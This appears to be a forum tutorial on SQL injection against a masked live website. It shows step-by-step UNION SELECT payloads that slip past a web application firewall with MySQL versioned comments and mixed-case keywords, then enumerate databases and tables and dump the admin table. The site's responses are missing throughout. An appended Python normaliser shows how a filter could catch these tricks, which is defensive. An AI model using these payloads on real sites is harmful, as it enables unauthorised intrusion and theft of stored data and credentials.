SQL injection; Basic WAF bypass
Assuming you have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)
You do the regular command:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--
The website returns this error message:
What you want to do now is wrap the blocked keywords in MySQL versioned inline comments (/*! ... */): the WAF treats them as comments, but MySQL still executes what is inside. Like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--
And now the website returns this:
OK, now we'll try to add version(), database() and user() in one line, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--
The website returns this:
Now we write "concat" in mixed upper and lower case, since MySQL function names are case-insensitive but a case-sensitive filter is not, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--
The website returns:
Now for the good part: let's try to list all the databases. Here is the regular syntax:
Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--
But with our new techniques the syntax would look like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--
The website returns:
Now we want to get the tables:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--
The website returns:
Now you have to wrap information_schema (or tables) in an inline comment as well, like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--
And this returns:
It's the same to get the columns; you know the drill.
If you now want to dump the id column from the admin table, you do it like this:
Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from admin--
REMEMBER: this is only a BASIC WAF bypass; the techniques are endless.
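A defender-side counterpart to the walkthrough above, added here and not part of the original post: a small Python normaliser that undoes the two tricks this post relies on (MySQL /*! ... */ versioned comments and mixed-case keywords) before matching signatures, run over constructed sample requests modelled on the post's payloads. The sample strings and the two regexes are my own assumptions about what a naive filter and a normalising filter might look like.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample query strings, shaped like the payloads in this post.
SAMPLES = {
    "plain":     "id=-182 UNION SELECT 1,2,3 from information_schema.schemata--",
    "versioned": "id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt(version(),0x3a,user()),5--",
    "schema":    "id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5 "
                 "from /*!information_schema*/.tables where table_schema=database()--",
    "benign":    "id=182&sort=name",
}

# Assumed naive signature of the kind this post defeats: exact keywords,
# a single space, case-sensitive, and a literal dot after the schema name.
NAIVE = re.compile(r"UNION SELECT|information_schema\.")

def naive_blocks(query: str) -> bool:
    return NAIVE.search(query) is not None

def normalize_sql(query: str) -> str:
    """Canonicalise the input the way MySQL will read it, then lower-case it."""
    s = unquote_plus(query)                                       # undo %xx and '+' encoding
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s, flags=re.S)    # MySQL executes the body of /*!...*/
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)                  # ordinary comments act as whitespace
    s = re.sub(r"\s+", " ", s)                                    # collapse tabs, newlines, runs of spaces
    return s.lower().strip()

# Signature applied to the normalised form: keyword boundaries, any whitespace,
# optional ALL/DISTINCT, and the schema name on its own regardless of what follows.
NORMALIZED = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b|\binformation_schema\b")

def normalized_blocks(query: str) -> bool:
    return NORMALIZED.search(normalize_sql(query)) is not None

def verdicts(samples=SAMPLES):
    """Return {name: (naive_filter_blocks, normalising_filter_blocks)} for each sample."""
    return {name: (naive_blocks(q), normalized_blocks(q)) for name, q in samples.items()}

if __name__ == "__main__":
    for name, (naive, norm) in verdicts().items():
        print(f"{name:10} naive={naive!s:5} normalized={norm}")
```

The naive signature catches only the "plain" sample; after normalisation every obfuscated sample is caught and the benign one still passes, which is why a WAF should match on a canonicalised form rather than on the raw request.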